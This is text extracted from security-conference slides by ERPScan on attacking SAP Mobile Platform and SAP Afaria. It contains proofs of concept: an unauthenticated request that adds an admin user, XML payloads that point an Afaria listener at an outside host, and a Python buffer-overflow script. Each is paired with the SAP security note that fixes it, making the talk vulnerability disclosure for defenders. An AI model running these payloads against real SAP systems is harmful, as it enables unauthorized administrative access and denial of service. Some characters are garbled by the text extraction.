Attacking SAP Mobile

Invest in security to secure investments

A"acking SAP Mobile

Dmitry Chastukhin. ERPScan

About ERPScan

•  The only 360-‐degree SAP Security solu=on -‐ ERPScan Security Monitoring Suite for SAP

•  Leader by the number of acknowledgements from SAP ( 150+ ) •  60+ presentaCons key security conferences worldwide •  25 Awards and nominaCons •  Research team -‐ 20 experts with experience in different areas

of security •  Headquarters in Palo Alto (US) and Amsterdam (EU)

2

SAP Mobile Pla,orm

3

What is it?

4

SMP architecture

5

Supported plaMorms

Objec=ve-‐C .NET

6

SMP protocols

SUP 2.1.3 SUP 2.2 SMP 2.3 SMP 3.0

SMP Messaging x x x x SMP ReplicaCon x x x x HTTP Rest API x x x SAP Agentry x x

7

SMP services

8

•  SAP Control Center

•  SAP SQL Anywhere services

•  SAP Mobile Server

SAP Control Center (Portal)

•  Working process: sccservice.exe •  Open ports:

–  2100 (Messaging service) –  8282/8283 (Portal) –  9999 (RMI)

9

SMP services

10




SQL Anywhere

11

SMP services

12




SAP Mobile Server services

•  MobiLink •  AdminWebServices

•  MlsrvWrapper •  InfoboxMul=plexer

•  OBMO •  JMSBridge

13

SAP Mobile Server (MobiLink)

14

•  Uses Cassini Web Server 1.0

•  Listens to the local port 5100

15

AdminWebServices

SAP Mobile Pla,orm vulnerabili6es

16

DecrypCng the SAP Mobile PlaMorm GIOP protocol

17


•  GIOP – General Inter-‐ORB Protocol (GIOP) is the abstract protocol by which object request brokers (ORBs) communicate

•  Uses mlsrv16.exe (Mobilink) – port 2000

18


19

XXE in the SAP Mobile Platform portal page…

•  Portal URL: h8ps://IP_ADDR:8283/scc •  web.xml & services-‐config.xml

C:\SAP\SCC-‐3_2\services\EmbeddedWebContainer\container\Je8y-‐7.6.2.v20120308\work\je8y-‐0.0.0.0-‐8282-‐scc.war-‐_scc-‐any-‐\webapp\WEB-‐INF\web.xml

<servlet-mapping>

<servlet-name>MessageBrokerServlet</servlet-name>

<url-pattern>/messagebroker/*</url-pattern>

</servlet-mapping>

20

…XXE…

C:\SAP\SCC-‐3_2\services\EmbeddedWebContainer\container\Je8y-‐7.6.2.v20120308\work\je8y-‐0.0.0.0-‐8282-‐scc.war-‐_scc-‐any-‐\webapp\WEB-‐INF\flex\services-‐config.xml

********************************

<channel-definition id="scc-http"

class="mx.messaging.channels.HTTPChannel">

<endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"

class="flex.messaging.endpoints.HTTPEndpoint" />

</channel-definition>

********************************

1.  /scc/messagebroker/amfpolling

2.  /scc/messagebroker/amfsecurepolling

3.  /scc/messagebroker/h"p

4.  /scc/messagebroker/h"psecure

5.  /scc/messagebroker/amflongpolling

21

…XXE

22

Read file with XXE

C:\SAP\MobilePla,orm\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.proper6es

sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d

23

Decrypt sup.imo.upa

24

PrevenCon

•  Install SAP Security note 2125358 •  SAP Mobile Pladorm XXE vulnarability

25

SAP Mobile PlaMorm unauthenCcated access to other servlets

•  Architecture and program vulnerabili6es in SAP’s J2EE engine

(BlackHat USA 2011)

•  web.xml files revealed hidden methods to:

–  Read and generate logs

–  Deploy and install JAR packages

26

AdminWebService

POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: length strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100

27

SAP SQL Anywhere BoF/Code ExecuCon

•  CVE-‐2008-‐0912 –  The MobiLink server is affected by a heap overflow which happens

during the handling of strings like username, version, and remote ID (all

pre-‐auth) which are longer than 128 bytes

•  CVE-‐2014-‐9264 –  Stack-‐based buffer overflow in the .NET Data Provider in SAP SQL

Anywhere allows remote a"ackers to execute arbitrary code via a

craked column alias

28

First PSH request

29

First PSH request

• 

30

SQL Anywhere DoS

31

PrevenCon

•  Install SAP security note 2108161 •  Denial of service in SAP SQL Anywhere

32

SAP EMR Unwired SQL injecCon

•  CVE-‐2013-‐7096 (CVSS 7.5) •  AndroidManifest.xml: <provider

android:name=".providers.ModiDataDbProvider"

android:authorities="com.sap.mobi.docsprovider" />

1.  content://com.sap.mobi.docsprovider/documents/offline_cat

2.  content://com.sap.mobi.docsprovider/documents/offline/

3.  content://com.sap.mobi.docsprovider/documents/sample

4.  content://com.sap.mobi.docsprovider/documents/online

5.  content://com.sap.mobi.docsprovider/documents/offline_auth

6.  content://com.sap.mobi.docsprovider/documents/offline

7.  content://com.sap.mobi.docsprovider/documents/online_auth

8.  content://com.sap.mobi.docsprovider/documents/sample/

9.  content://com.sap.mobi.docsprovider/documents/online_cat

33

Preven=on

•  Install SAP security note 1864518 •  Security Improvements for MOB-‐APP-‐EMR-‐AND

34

SAP Afaria

35

SAP Afaria

•  MDM Solu=on –  Version 7.0 SP5: Released August 2014 ( as SAP Afaria SP5) –  Version 7.0 SP4: Released December 2013 (as SAP Afaria SP4) –  Version 7.0 SP2: Released December 2012 (as SAP Afaria SP2) –  Version 7.0: Released April 2012 (as SAP Afaria) –  Version 6.6: Released September 2010 –  Version 6.5: Released November 2009 –  Version 6.0: Released December 2008 –  Version 5.0: Released November 2003 –  Version 4.0: Released June 2000 (as Afaria) –  Version 3.5: Released May 2000 (as Afaria for Handhelds) –  Version 3.0: Released October 1999 –  Version 2.0: Released February 1999 (as CONNECT:Manage) –  Version 1.2: Released October 1997 (as RemoteWare Express) –  Version 1.0: Released February 1997 (as SessionXpress)

36

How it works

•  Provide and enroll devices in management

•  Define device sepngs

•  Secure devices and data

•  Collect inventory

•  Distribute sokware

•  Collect device ac=vity data

for managing expenses

37

Enrollment policy

38

ConfiguraCon policy

39

ApplicaCon policy

40

Device informaCon

41

Device informaCon

42

Device informaCon

43

CommunicaCon

44

SAP Afaria vulnerabili6es

45

Good news

46

Good news

47

Missing authorizaCon

•  Command value Run Channel or Test •  The XML request must start with 4 spaces •  PoC: <AfariaNotify version="1.0.0"> <Message type="Command" value="Run Channel"> <Client name="AFARIA70PT"> <Client name="LOCALHOST"

GUID="59146189-1f92-46d5-85aa-6293631d5d2e"> <Transmitter address="172.16.2.67:4444\asd"> <Channel address="\\172.16.2.67:4444\asd" name="\

\172.16.2.67:4444\df"></Channel> </Transmitter> </Client> </Message> </AfariaNotify>

48

PrevenCon

Install SAP security note 2134905 Missing authoriza=on check in XCListener

49

•  Install SAP security note 1864518 •  Security Improvements for MOB-‐APP-‐EMR-‐AND

XcListener DoS

<AfariaNotify version="1.0.0">

<Message type="Command" value="Run Channel" > <Client name="LOCALHOST" >

<Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">

<Transmitter address="172.16.2.67:4444\">

<Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\(A*1491)">

</Channel> </Transmitter>

</Client>

</Message>

</AfariaNotify>(A*3678)

50

XcListener BoF

•  PoC: import socket HOST = ‘hostname' PORT = 3005 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) poc = 'A'*4098 s.send(poc) data = s.recv(10000) s.close() print 'Received', (data)

51

PrevenCon

•  Install SAP security note 2132584 •  Buffer overflow in SAP Afaria 7 XcListener

52

Each SAP landscape is unique and we pay close a8en6on to the requirements of our customers and prospects. ERPScan development team constantly addresses these specific needs and is ac6vely involved in product advancement. If you wish to know whether our scanner addresses a par6cular aspect, or simply have a feature wish list, please e-‐mail us. We will be glad to consider your sugges6ons for the future releases or monthly updates.

53

About

228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

USA HQ

Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam

EU HQ

www.erpscan.com [email protected]

Software

Attacking SAP Mobile